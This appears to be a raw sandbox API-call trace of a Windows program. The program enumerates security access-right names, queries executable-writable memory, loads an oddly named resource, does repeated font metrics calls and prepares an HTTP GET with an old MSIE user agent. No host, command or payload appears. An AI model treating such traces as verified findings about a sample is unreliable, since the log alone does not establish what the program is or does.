[0201.265] SysReAllocStringLen (in: pbstr=0x2a1dea0*=0x0, psz="DESKTOP_JOURNALPLAYBACK", len=0x17 | out: pbstr=0x2a1dea0*="DESKTOP_JOURNALPLAYBACK") returned 1
[0201.265] SysReAllocStringLen (in: pbstr=0x2a1de90*=0x0, psz="DESKTOP_HOOKCONTROL", len=0x13 | out: pbstr=0x2a1de90*="DESKTOP_HOOKCONTROL") returned 1
[0201.265] SysReAllocStringLen (in: pbstr=0x2a1de80*=0x0, psz="DESKTOP_CREATEWINDOW", len=0x14 | out: pbstr=0x2a1de80*="DESKTOP_CREATEWINDOW") returned 1
[0201.265] SysReAllocStringLen (in: pbstr=0x2a1de70*=0x0, psz="DESKTOP_CREATEMENU", len=0x12 | out: pbstr=0x2a1de70*="DESKTOP_CREATEMENU") returned 1
[0201.265] SysReAllocStringLen (in: pbstr=0x2a1de60*=0x0, psz="DESKTOP_READOBJECTS", len=0x13 | out: pbstr=0x2a1de60*="DESKTOP_READOBJECTS") returned 1
[0201.266] SysReAllocStringLen (in: pbstr=0x2a1de50*=0x0, psz="DESKTOP_ENUMERATE", len=0x11 | out: pbstr=0x2a1de50*="DESKTOP_ENUMERATE") returned 1
[0201.266] SysReAllocStringLen (in: pbstr=0x2a1de40*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a1de40*="STANDARD_RIGHTS_EXECUTE") returned 1
[0201.266] SysReAllocStringLen (in: pbstr=0x2a1de30*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a1de30*="STANDARD_RIGHTS_WRITE") returned 1
[0201.266] SysReAllocStringLen (in: pbstr=0x2a1de20*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a1de20*="STANDARD_RIGHTS_READ") returned 1
[0201.266] SysReAllocStringLen (in: pbstr=0x2a1de10*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a1de10*="STANDARD_RIGHTS_ALL") returned 1
[0201.266] SysReAllocStringLen (in: pbstr=0x2a1de00*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a1de00*="DELETE") returned 1
[0201.266] SysReAllocStringLen (in: pbstr=0x2a1ddf0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a1ddf0*="READ_CONTROL") returned 1
[0201.266] SysReAllocStringLen (in: pbstr=0x2a1dde0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a1dde0*="WRITE_OWNER") returned 1
[0201.266] SysReAllocStringLen (in: pbstr=0x2a1ddd0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a1ddd0*="WRITE_DAC") returned 1
[0201.266] SysReAllocStringLen (in: pbstr=0x2a1ddc0*=0x0, psz="WINSTA_WRITEATTRIBUTES", len=0x16 | out: pbstr=0x2a1ddc0*="WINSTA_WRITEATTRIBUTES") returned 1
[0201.266] SysReAllocStringLen (in: pbstr=0x2a1ddb0*=0x0, psz="WINSTA_READSCREEN", len=0x11 | out: pbstr=0x2a1ddb0*="WINSTA_READSCREEN") returned 1
[0201.266] SysReAllocStringLen (in: pbstr=0x2a1dda0*=0x0, psz="WINSTA_READATTRIBUTES", len=0x15 | out: pbstr=0x2a1dda0*="WINSTA_READATTRIBUTES") returned 1
[0201.266] SysReAllocStringLen (in: pbstr=0x2a1dd90*=0x0, psz="WINSTA_EXITWINDOWS", len=0x12 | out: pbstr=0x2a1dd90*="WINSTA_EXITWINDOWS") returned 1
[0201.266] SysReAllocStringLen (in: pbstr=0x2a1dd80*=0x0, psz="WINSTA_ENUMERATE", len=0x10 | out: pbstr=0x2a1dd80*="WINSTA_ENUMERATE") returned 1
[0201.266] SysReAllocStringLen (in: pbstr=0x2a1dd70*=0x0, psz="WINSTA_ENUMDESKTOPS", len=0x13 | out: pbstr=0x2a1dd70*="WINSTA_ENUMDESKTOPS") returned 1
[0201.266] SysReAllocStringLen (in: pbstr=0x2a1dd60*=0x0, psz="WINSTA_CREATEDESKTOP", len=0x14 | out: pbstr=0x2a1dd60*="WINSTA_CREATEDESKTOP") returned 1
[0201.266] SysReAllocStringLen (in: pbstr=0x2a1dd50*=0x0, psz="WINSTA_ACCESSGLOBALATOMS", len=0x18 | out: pbstr=0x2a1dd50*="WINSTA_ACCESSGLOBALATOMS") returned 1
[0201.266] SysReAllocStringLen (in: pbstr=0x2a1dd40*=0x0, psz="WINSTA_ACCESSCLIPBOARD", len=0x16 | out: pbstr=0x2a1dd40*="WINSTA_ACCESSCLIPBOARD") returned 1
[0201.266] SysReAllocStringLen (in: pbstr=0x2a1dd30*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a1dd30*="STANDARD_RIGHTS_EXECUTE") returned 1
[0201.266] SysReAllocStringLen (in: pbstr=0x2a1dd20*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a1dd20*="STANDARD_RIGHTS_WRITE") returned 1
[0201.266] SysReAllocStringLen (in: pbstr=0x2a1dd10*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a1dd10*="STANDARD_RIGHTS_READ") returned 1
[0201.266] SysReAllocStringLen (in: pbstr=0x2a1dd00*=0x0, psz="STANDARD_RIGHTS_REQUIRED", len=0x18 | out: pbstr=0x2a1dd00*="STANDARD_RIGHTS_REQUIRED") returned 1
[0201.266] SysReAllocStringLen (in: pbstr=0x2a1dcf0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a1dcf0*="READ_CONTROL") returned 1
[0201.266] SysReAllocStringLen (in: pbstr=0x2a1dce0*=0x0, psz="SI_ACCESS_SPECIFIC", len=0x12 | out: pbstr=0x2a1dce0*="SI_ACCESS_SPECIFIC") returned 1
[0201.266] SysReAllocStringLen (in: pbstr=0x2a1dcd0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a1dcd0*="WRITE_DAC") returned 1
[0201.266] SysReAllocStringLen (in: pbstr=0x2a1dcc0*=0x0, psz="FILE_DELETE", len=0xb | out: pbstr=0x2a1dcc0*="FILE_DELETE") returned 1
[0201.266] SysReAllocStringLen (in: pbstr=0x2a1dcb0*=0x0, psz="FILE_DELETE_CHILD", len=0x11 | out: pbstr=0x2a1dcb0*="FILE_DELETE_CHILD") returned 1
[0201.268] SetClassLongA (hWnd=0x1101de, nIndex=-14, dwNewLong=65575) returned 0x0
[0201.268] GetSystemMenu (hWnd=0x1101de, bRevert=0) returned 0xe01e7
[0201.268] DeleteMenu (hMenu=0xe01e7, uPosition=0xf030, uFlags=0x0) returned 1
[0201.268] DeleteMenu (hMenu=0xe01e7, uPosition=0xf000, uFlags=0x0) returned 1
[0201.268] DeleteMenu (hMenu=0xe01e7, uPosition=0xf010, uFlags=0x0) returned 1
[0201.268] GetCurrentThreadId () returned 0x8e4
[0201.268] ResetEvent (hEvent=0xa0) returned 1
[0201.268] GetCurrentThreadId () returned 0x8e4
[0201.268] GetCurrentThreadId () returned 0x8e4
[0201.268] GetCurrentThreadId () returned 0x8e4
[0201.268] ResetEvent (hEvent=0xa0) returned 1
[0201.269] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x22f264, fWinIni=0x0 | out: pvParam=0x22f264) returned 1
[0201.269] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x22f264, fWinIni=0x0 | out: pvParam=0x22f264) returned 1
[0201.269] GetSystemMetrics (nIndex=49) returned 16
[0201.269] GetSystemMetrics (nIndex=50) returned 16
[0201.269] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x22f2ac, fWinIni=0x0 | out: pvParam=0x22f2ac) returned 1
[0201.269] IsWindowVisible (hWnd=0x1101de) returned 0
[0201.269] GetCurrentThreadId () returned 0x8e4
[0201.269] VirtualQuery (in: lpAddress=0x29f1668, lpBuffer=0x22f17c, dwLength=0x1c | out: lpBuffer=0x22f17c*(BaseAddress=0x29f1000, AllocationBase=0x2930000, AllocationProtect=0x40, RegionSize=0x52000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c
[0201.269] FindResourceA (hModule=0x2930000, lpName="TmarxvxinhhmA", lpType=0xa) returned 0x2a38990
[0201.269] FindResourceA (hModule=0x2930000, lpName="TmarxvxinhhmA", lpType=0xa) returned 0x2a38990
[0201.269] LoadResource (hModule=0x2930000, hResInfo=0x2a38990) returned 0x2a3f044
[0201.269] SizeofResource (hModule=0x2930000, hResInfo=0x2a38990) returned 0xca5
[0201.270] LockResource (hResData=0x2a3f044) returned 0x2a3f044
[0201.270] GetCurrentThreadId () returned 0x8e4
[0201.270] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x22ef30, fWinIni=0x0 | out: pvParam=0x22ef30) returned 1
[0201.270] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x22ef30, fWinIni=0x0 | out: pvParam=0x22ef30) returned 1
[0201.270] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x22ef30, fWinIni=0x0 | out: pvParam=0x22ef30) returned 1
[0201.270] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x22ef30, fWinIni=0x0 | out: pvParam=0x22ef30) returned 1
[0201.271] GetDC (hWnd=0x0) returned 0x3c010860
[0201.271] GetTextMetricsA (in: hdc=0x3c010860, lptm=0x22ef14 | out: lptm=0x22ef14) returned 1
[0201.271] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="MS Sans Serif", cchCount1=13, lpString2="Default", cchCount2=7) returned 3
[0201.272] CreateFontIndirectA (lplf=0x22eecc) returned 0x5c0a0866
[0201.273] SelectObject (hdc=0x3c010860, h=0x5c0a0866) returned 0x18a002e
[0201.273] GetTextMetricsA (in: hdc=0x3c010860, lptm=0x22ef4c | out: lptm=0x22ef4c) returned 1
[0201.273] SelectObject (hdc=0x3c010860, h=0x18a002e) returned 0x5c0a0866
[0201.273] ReleaseDC (hWnd=0x0, hDC=0x3c010860) returned 1
[0201.273] GetSystemMetrics (nIndex=6) returned 1
[0201.273] VirtualAlloc (lpAddress=0x2a54000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2a54000
[0201.273] GetDC (hWnd=0x0) returned 0x3c010860
[0201.273] GetTextMetricsA (in: hdc=0x3c010860, lptm=0x22ef14 | out: lptm=0x22ef14) returned 1
[0201.273] SelectObject (hdc=0x3c010860, h=0x5c0a0866) returned 0x18a002e
[0201.274] GetTextMetricsA (in: hdc=0x3c010860, lptm=0x22ef4c | out: lptm=0x22ef4c) returned 1
[0201.274] SelectObject (hdc=0x3c010860, h=0x18a002e) returned 0x5c0a0866
[0201.274] ReleaseDC (hWnd=0x0, hDC=0x3c010860) returned 1
[0201.274] GetSystemMetrics (nIndex=6) returned 1
[0201.274] GetDC (hWnd=0x0) returned 0x3c010860
[0201.274] GetTextMetricsA (in: hdc=0x3c010860, lptm=0x22ef14 | out: lptm=0x22ef14) returned 1
[0201.274] SelectObject (hdc=0x3c010860, h=0x5c0a0866) returned 0x18a002e
[0201.274] GetTextMetricsA (in: hdc=0x3c010860, lptm=0x22ef4c | out: lptm=0x22ef4c) returned 1
[0201.274] SelectObject (hdc=0x3c010860, h=0x18a002e) returned 0x5c0a0866
[0201.274] ReleaseDC (hWnd=0x0, hDC=0x3c010860) returned 1
[0201.274] GetSystemMetrics (nIndex=6) returned 1
[0201.275] GetDC (hWnd=0x0) returned 0x3c010860
[0201.275] GetTextMetricsA (in: hdc=0x3c010860, lptm=0x22ef14 | out: lptm=0x22ef14) returned 1
[0201.275] SelectObject (hdc=0x3c010860, h=0x5c0a0866) returned 0x18a002e
[0201.275] GetTextMetricsA (in: hdc=0x3c010860, lptm=0x22ef4c | out: lptm=0x22ef4c) returned 1
[0201.275] SelectObject (hdc=0x3c010860, h=0x18a002e) returned 0x5c0a0866
[0201.275] ReleaseDC (hWnd=0x0, hDC=0x3c010860) returned 1
[0201.275] GetSystemMetrics (nIndex=6) returned 1
[0201.275] GetDC (hWnd=0x0) returned 0x3c010860
[0201.275] GetTextMetricsA (in: hdc=0x3c010860, lptm=0x22ef28 | out: lptm=0x22ef28) returned 1
[0201.275] SelectObject (hdc=0x3c010860, h=0x5c0a0866) returned 0x18a002e
[0201.275] GetTextMetricsA (in: hdc=0x3c010860, lptm=0x22ef60 | out: lptm=0x22ef60) returned 1
[0201.275] SelectObject (hdc=0x3c010860, h=0x18a002e) returned 0x5c0a0866
[0201.275] ReleaseDC (hWnd=0x0, hDC=0x3c010860) returned 1
[0201.275] GetSystemMetrics (nIndex=6) returned 1
[0201.276] GetDC (hWnd=0x0) returned 0x3c010860
[0201.276] GetTextMetricsA (in: hdc=0x3c010860, lptm=0x22ec2c | out: lptm=0x22ec2c) returned 1
[0201.276] SelectObject (hdc=0x3c010860, h=0x5c0a0866) returned 0x18a002e
[0201.276] GetTextMetricsA (in: hdc=0x3c010860, lptm=0x22ec64 | out: lptm=0x22ec64) returned 1
[0201.276] SelectObject (hdc=0x3c010860, h=0x18a002e) returned 0x5c0a0866
[0201.276] ReleaseDC (hWnd=0x0, hDC=0x3c010860) returned 1
[0201.276] GetSystemMetrics (nIndex=6) returned 1
[0201.276] GetDC (hWnd=0x0) returned 0x3c010860
[0201.276] GetTextMetricsA (in: hdc=0x3c010860, lptm=0x22ef28 | out: lptm=0x22ef28) returned 1
[0201.276] SelectObject (hdc=0x3c010860, h=0x5c0a0866) returned 0x18a002e
[0201.276] GetTextMetricsA (in: hdc=0x3c010860, lptm=0x22ef60 | out: lptm=0x22ef60) returned 1
[0201.276] SelectObject (hdc=0x3c010860, h=0x18a002e) returned 0x5c0a0866
[0201.276] ReleaseDC (hWnd=0x0, hDC=0x3c010860) returned 1
[0201.276] GetSystemMetrics (nIndex=6) returned 1
[0201.276] GetDC (hWnd=0x0) returned 0x3c010860
[0201.276] GetTextMetricsA (in: hdc=0x3c010860, lptm=0x22ec2c | out: lptm=0x22ec2c) returned 1
[0201.276] SelectObject (hdc=0x3c010860, h=0x5c0a0866) returned 0x18a002e
[0201.277] GetTextMetricsA (in: hdc=0x3c010860, lptm=0x22ec64 | out: lptm=0x22ec64) returned 1
[0201.277] SelectObject (hdc=0x3c010860, h=0x18a002e) returned 0x5c0a0866
[0201.277] ReleaseDC (hWnd=0x0, hDC=0x3c010860) returned 1
[0201.277] GetSystemMetrics (nIndex=6) returned 1
[0201.277] GetDC (hWnd=0x0) returned 0x3c010860
[0201.277] GetTextMetricsA (in: hdc=0x3c010860, lptm=0x22ef28 | out: lptm=0x22ef28) returned 1
[0201.277] SelectObject (hdc=0x3c010860, h=0x5c0a0866) returned 0x18a002e
[0201.277] GetTextMetricsA (in: hdc=0x3c010860, lptm=0x22ef60 | out: lptm=0x22ef60) returned 1
[0201.277] SelectObject (hdc=0x3c010860, h=0x18a002e) returned 0x5c0a0866
[0201.277] ReleaseDC (hWnd=0x0, hDC=0x3c010860) returned 1
[0201.277] GetSystemMetrics (nIndex=6) returned 1
[0201.277] GetDC (hWnd=0x0) returned 0x3c010860
[0201.277] GetTextMetricsA (in: hdc=0x3c010860, lptm=0x22ec2c | out: lptm=0x22ec2c) returned 1
[0201.277] SelectObject (hdc=0x3c010860, h=0x5c0a0866) returned 0x18a002e
[0201.277] GetTextMetricsA (in: hdc=0x3c010860, lptm=0x22ec64 | out: lptm=0x22ec64) returned 1
[0201.277] SelectObject (hdc=0x3c010860, h=0x18a002e) returned 0x5c0a0866
[0201.277] ReleaseDC (hWnd=0x0, hDC=0x3c010860) returned 1
[0201.277] GetSystemMetrics (nIndex=6) returned 1
[0201.278] GetDC (hWnd=0x0) returned 0x3c010860
[0201.278] GetTextMetricsA (in: hdc=0x3c010860, lptm=0x22ef14 | out: lptm=0x22ef14) returned 1
[0201.278] SelectObject (hdc=0x3c010860, h=0x5c0a0866) returned 0x18a002e
[0201.278] GetTextMetricsA (in: hdc=0x3c010860, lptm=0x22ef4c | out: lptm=0x22ef4c) returned 1
[0201.278] SelectObject (hdc=0x3c010860, h=0x18a002e) returned 0x5c0a0866
[0201.278] ReleaseDC (hWnd=0x0, hDC=0x3c010860) returned 1
[0201.278] GetSystemMetrics (nIndex=6) returned 1
[0201.278] GetDC (hWnd=0x0) returned 0x3c010860
[0201.278] GetTextMetricsA (in: hdc=0x3c010860, lptm=0x22ef14 | out: lptm=0x22ef14) returned 1
[0201.278] SelectObject (hdc=0x3c010860, h=0x5c0a0866) returned 0x18a002e
[0201.278] GetTextMetricsA (in: hdc=0x3c010860, lptm=0x22ef4c | out: lptm=0x22ef4c) returned 1
[0201.278] SelectObject (hdc=0x3c010860, h=0x18a002e) returned 0x5c0a0866
[0201.278] ReleaseDC (hWnd=0x0, hDC=0x3c010860) returned 1
[0201.278] GetSystemMetrics (nIndex=6) returned 1
[0201.279] GetDC (hWnd=0x0) returned 0x3c010860
[0201.279] GetTextMetricsA (in: hdc=0x3c010860, lptm=0x22ef28 | out: lptm=0x22ef28) returned 1
[0201.279] SelectObject (hdc=0x3c010860, h=0x5c0a0866) returned 0x18a002e
[0201.279] GetTextMetricsA (in: hdc=0x3c010860, lptm=0x22ef60 | out: lptm=0x22ef60) returned 1
[0201.279] SelectObject (hdc=0x3c010860, h=0x18a002e) returned 0x5c0a0866
[0201.279] ReleaseDC (hWnd=0x0, hDC=0x3c010860) returned 1
[0201.279] GetSystemMetrics (nIndex=6) returned 1
[0201.279] GetDC (hWnd=0x0) returned 0x3c010860
[0201.279] GetTextMetricsA (in: hdc=0x3c010860, lptm=0x22ec2c | out: lptm=0x22ec2c) returned 1
[0201.279] SelectObject (hdc=0x3c010860, h=0x5c0a0866) returned 0x18a002e
[0201.279] GetTextMetricsA (in: hdc=0x3c010860, lptm=0x22ec64 | out: lptm=0x22ec64) returned 1
[0201.279] SelectObject (hdc=0x3c010860, h=0x18a002e) returned 0x5c0a0866
[0201.279] ReleaseDC (hWnd=0x0, hDC=0x3c010860) returned 1
[0201.279] GetSystemMetrics (nIndex=6) returned 1
[0201.279] GetDC (hWnd=0x0) returned 0x3c010860
[0201.279] GetTextMetricsA (in: hdc=0x3c010860, lptm=0x22ef28 | out: lptm=0x22ef28) returned 1
[0201.279] SelectObject (hdc=0x3c010860, h=0x5c0a0866) returned 0x18a002e
[0201.279] GetTextMetricsA (in: hdc=0x3c010860, lptm=0x22ef60 | out: lptm=0x22ef60) returned 1
[0201.279] SelectObject (hdc=0x3c010860, h=0x18a002e) returned 0x5c0a0866
[0201.279] ReleaseDC (hWnd=0x0, hDC=0x3c010860) returned 1
[0201.280] GetSystemMetrics (nIndex=6) returned 1
[0201.280] GetDC (hWnd=0x0) returned 0x3c010860
[0201.280] GetTextMetricsA (in: hdc=0x3c010860, lptm=0x22ec2c | out: lptm=0x22ec2c) returned 1
[0201.280] SelectObject (hdc=0x3c010860, h=0x5c0a0866) returned 0x18a002e
[0201.280] GetTextMetricsA (in: hdc=0x3c010860, lptm=0x22ec64 | out: lptm=0x22ec64) returned 1
[0201.280] SelectObject (hdc=0x3c010860, h=0x18a002e) returned 0x5c0a0866
[0201.280] ReleaseDC (hWnd=0x0, hDC=0x3c010860) returned 1
[0201.280] GetSystemMetrics (nIndex=6) returned 1
[0201.280] GetDC (hWnd=0x0) returned 0x3c010860
[0201.281] GetTextMetricsA (in: hdc=0x3c010860, lptm=0x22ef28 | out: lptm=0x22ef28) returned 1
[0201.281] SelectObject (hdc=0x3c010860, h=0x5c0a0866) returned 0x18a002e
[0201.281] GetTextMetricsA (in: hdc=0x3c010860, lptm=0x22ef60 | out: lptm=0x22ef60) returned 1
[0201.281] SelectObject (hdc=0x3c010860, h=0x18a002e) returned 0x5c0a0866
[0201.281] ReleaseDC (hWnd=0x0, hDC=0x3c010860) returned 1
[0201.281] GetSystemMetrics (nIndex=6) returned 1
[0201.281] GetDC (hWnd=0x0) returned 0x3c010860
[0201.281] GetTextMetricsA (in: hdc=0x3c010860, lptm=0x22ec2c | out: lptm=0x22ec2c) returned 1
[0201.281] SelectObject (hdc=0x3c010860, h=0x5c0a0866) returned 0x18a002e
[0201.281] GetTextMetricsA (in: hdc=0x3c010860, lptm=0x22ec64 | out: lptm=0x22ec64) returned 1
[0201.281] SelectObject (hdc=0x3c010860, h=0x18a002e) returned 0x5c0a0866
[0201.281] ReleaseDC (hWnd=0x0, hDC=0x3c010860) returned 1
[0201.281] GetSystemMetrics (nIndex=6) returned 1
[0201.281] GetDC (hWnd=0x0) returned 0x3c010860
[0201.281] GetTextMetricsA (in: hdc=0x3c010860, lptm=0x22ef28 | out: lptm=0x22ef28) returned 1
[0201.281] SelectObject (hdc=0x3c010860, h=0x5c0a0866) returned 0x18a002e
[0201.281] GetTextMetricsA (in: hdc=0x3c010860, lptm=0x22ef60 | out: lptm=0x22ef60) returned 1
[0201.281] SelectObject (hdc=0x3c010860, h=0x18a002e) returned 0x5c0a0866
[0201.282] ReleaseDC (hWnd=0x0, hDC=0x3c010860) returned 1
[0201.282] GetSystemMetrics (nIndex=6) returned 1
[0201.282] GetDC (hWnd=0x0) returned 0x3c010860
[0201.282] GetTextMetricsA (in: hdc=0x3c010860, lptm=0x22ec2c | out: lptm=0x22ec2c) returned 1
[0201.282] SelectObject (hdc=0x3c010860, h=0x5c0a0866) returned 0x18a002e
[0201.282] GetTextMetricsA (in: hdc=0x3c010860, lptm=0x22ec64 | out: lptm=0x22ec64) returned 1
[0201.282] SelectObject (hdc=0x3c010860, h=0x18a002e) returned 0x5c0a0866
[0201.282] ReleaseDC (hWnd=0x0, hDC=0x3c010860) returned 1
[0201.282] GetSystemMetrics (nIndex=6) returned 1
[0201.282] GetDC (hWnd=0x0) returned 0x3c010860
[0201.282] GetTextMetricsA (in: hdc=0x3c010860, lptm=0x22ef14 | out: lptm=0x22ef14) returned 1
[0201.282] SelectObject (hdc=0x3c010860, h=0x5c0a0866) returned 0x18a002e
[0201.282] GetTextMetricsA (in: hdc=0x3c010860, lptm=0x22ef4c | out: lptm=0x22ef4c) returned 1
[0201.282] SelectObject (hdc=0x3c010860, h=0x18a002e) returned 0x5c0a0866
[0201.282] ReleaseDC (hWnd=0x0, hDC=0x3c010860) returned 1
[0201.282] GetSystemMetrics (nIndex=6) returned 1
[0201.285] SysReAllocStringLen (in: pbstr=0x2a5f388*=0x0, psz="GET", len=0x3 | out: pbstr=0x2a5f388*="GET") returned 1
[0201.285] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0201.285] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0201.285] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0201.285] SysReAllocStringLen (in: pbstr=0x2a5f388*="GET", psz="GET", len=0x3 | out: pbstr=0x2a5f388*="GET") returned 1
[0201.285] SysReAllocStringLen (in: pbstr=0x2a5f3b8*=0x0, psz="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)", len=0x39 | out: pbstr=0x2a5f3b8*="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)") returned 1
[0201.285] InternetQueryOptionW (in: hInternet=0x0, dwOption=0x6, lpBuffer=0x22efb0, lpdwBufferLength=0x22efb4 | out: lpBuffer=0x22efb0, lpdwBufferLength=0x22efb4) returned 1
[0201.365] InternetSetOptionW (hInternet=0x0, dwOption=0x6, lpBuffer=0x22efb0, dwBufferLength=0x4) returned 1
[0201.365] VirtualFree (lpAddress=0x2a60000, dwSize=0x4000, dwFreeType=0x4000) returned 1
[0201.365] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x2a56490, cbMultiByte=3, lpWideCharStr=0x22dee8, cchWideChar=2047 | out: lpWideCharStr="GET") returned 3
[0201.365] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0201.365] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0201.365] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0201.365] SysReAllocStringLen (in: pbstr=0x2a5f388*="GET", psz="GET", len=0x3 | out: pbstr=0x2a5f388*="GET") returned 1
[0201.365] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0201.366] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0201.366] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0201.366] SysReAllocStringLen (in: pbstr=0x2a5f388*="GET", psz="GET", len=0x3 | out: pbstr=0x2a5f388*="GET") returned 1
[0201.367] FlatSB_SetScrollProp (param_1=0xc0140, index=0x200, newValue=0x0, param_4=1) returned 0
[0201.367] GetSysColor (nIndex=20) returned 0xffffff
[0201.367] FlatSB_SetScrollProp (param_1=0xc0140, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0201.367] FlatSB_SetScrollInfo (param_1=0xc0140, code=0, psi=0x22de1e, fRedraw=1)
[0201.367] CallWindowProcA (lpPrevWndFunc=0x2937038, hWnd=0xc0140, Msg=0x46, wParam=0x0, lParam=0x22dd1c) returned 0x0
[0201.371] GetTextExtentPoint32A (in: hdc=0x3c010860, lpString="0", c=1, psizl=0x22f0a4 | out: psizl=0x22f0a4) returned 1
[0201.371] IsIconic (hWnd=0xc0140) returned 0
[0201.371] GetClientRect (in: hWnd=0xc0140, lpRect=0x22f0a4 | out: lpRect=0x22f0a4) returned 1
[0201.371] GetWindowLongA (hWnd=0xc0140, nIndex=-16) returned 116326400
[0201.371] GetWindowLongA (hWnd=0xc0140, nIndex=-16) returned 116326400
[0201.371] IsIconic (hWnd=0xc0140) returned 0
[0201.371] GetClientRect (in: hWnd=0xc0140, lpRect=0x22efec | out: lpRect=0x22efec) returned 1
[0201.371] GetWindowLongA (hWnd=0xc0140, nIndex=-16) returned 116326400
[0201.372] GetWindowLongA (hWnd=0xc0140, nIndex=-16) returned 116326400
[0201.372] IsIconic (hWnd=0xc0140) returned 0
[0201.372] GetClientRect (in: hWnd=0xc0140, lpRect=0x22efbc | out: lpRect=0x22efbc) returned 1
[0201.372] GetWindowLongA (hWnd=0xc0140, nIndex=-16) returned 116326400
[0201.372] GetWindowLongA (hWnd=0xc0140, nIndex=-16) returned 116326400
[0201.372] IsIconic (hWnd=0xc0140) returned 0
[0201.372] GetClientRect (in: hWnd=0xc0140, lpRect=0x22efbc | out: lpRect=0x22efbc) returned 1
[0201.372] FlatSB_SetScrollProp (param_1=0xc0140, index=0x200, newValue=0x0, param_4=0) returned 0
[0201.372] GetSysColor (nIndex=20) returned 0xffffff
[0201.372] FlatSB_SetScrollProp (param_1=0xc0140, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0201.372] FlatSB_SetScrollInfo (param_1=0xc0140, code=0, psi=0x22effa, fRedraw=1) returned 0
[0201.372] GetWindowLongA (hWnd=0xc0140, nIndex=-16) returned 116326400
[0201.372] IsIconic (hWnd=0xc0140) returned 0
[0201.372] GetClientRect (in: hWnd=0xc0140, lpRect=0x22efbc | out: lpRect=0x22efbc) returned 1
[0201.372] GetWindowLongA (hWnd=0xc0140, nIndex=-16) returned 116326400
[0201.372] IsIconic (hWnd=0xc0140) returned 0
[0201.372] GetClientRect (in: hWnd=0xc0140, lpRect=0x22efbc | out: lpRect=0x22efbc) returned 1
[0201.372] GetWindowLongA (hWnd=0xc0140, nIndex=-16) returned 116326400
[0201.372] IsIconic (hWnd=0xc0140) returned 0
[0201.372] GetClientRect (in: hWnd=0xc0140, lpRect=0x22efbc | out: lpRect=0x22efbc) returned 1
[0201.372] FlatSB_SetScrollProp (param_1=0xc0140, index=0x100, newValue=0x0, param_4=0) returned 0
[0201.372] GetSysColor (nIndex=20) returned 0xffffff
[0201.372] FlatSB_SetScrollProp (param_1=0xc0140, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0201.372] FlatSB_SetScrollInfo (param_1=0xc0140, code=1, psi=0x22effa, fRedraw=1) returned 0
[0201.373] GetWindowLongA (hWnd=0xc0140, nIndex=-16) returned 116326400
[0201.373] IsIconic (hWnd=0xc0140) returned 0
[0201.373] GetClientRect (in: hWnd=0xc0140, lpRect=0x22efbc | out: lpRect=0x22efbc) returned 1
[0201.373] GetWindowLongA (hWnd=0xc0140, nIndex=-16) returned 116326400
[0201.373] GetWindowLongA (hWnd=0xc0140, nIndex=-16) returned 116326400
[0201.373] IsIconic (hWnd=0xc0140) returned 0
[0201.373] GetClientRect (in: hWnd=0xc0140, lpRect=0x22efec | out: lpRect=0x22efec) returned 1
[0201.373] GetWindowLongA (hWnd=0xc0140, nIndex=-16) returned 116326400
[0201.373] GetWindowLongA (hWnd=0xc0140, nIndex=-16) returned 116326400
[0201.373] IsIconic (hWnd=0xc0140) returned 0
[0201.373] GetClientRect (in: hWnd=0xc0140, lpRect=0x22efbc | out: lpRect=0x22efbc) returned 1
[0201.373] GetWindowLongA (hWnd=0xc0140, nIndex=-16) returned 116326400
[0201.373] GetWindowLongA (hWnd=0xc0140, nIndex=-16) returned 116326400
[0201.373] IsIconic (hWnd=0xc0140) returned 0
[0201.373] GetClientRect (in: hWnd=0xc0140, lpRect=0x22efbc | out: lpRect=0x22efbc) returned 1
[0201.373] FlatSB_SetScrollProp (param_1=0xc0140, index=0x200, newValue=0x0, param_4=0) returned 0
[0201.373] GetSysColor (nIndex=20) returned 0xffffff
[0201.373] FlatSB_SetScrollProp (param_1=0xc0140, index=0x80, newValue=0xffffff, param_4=0) returned 0
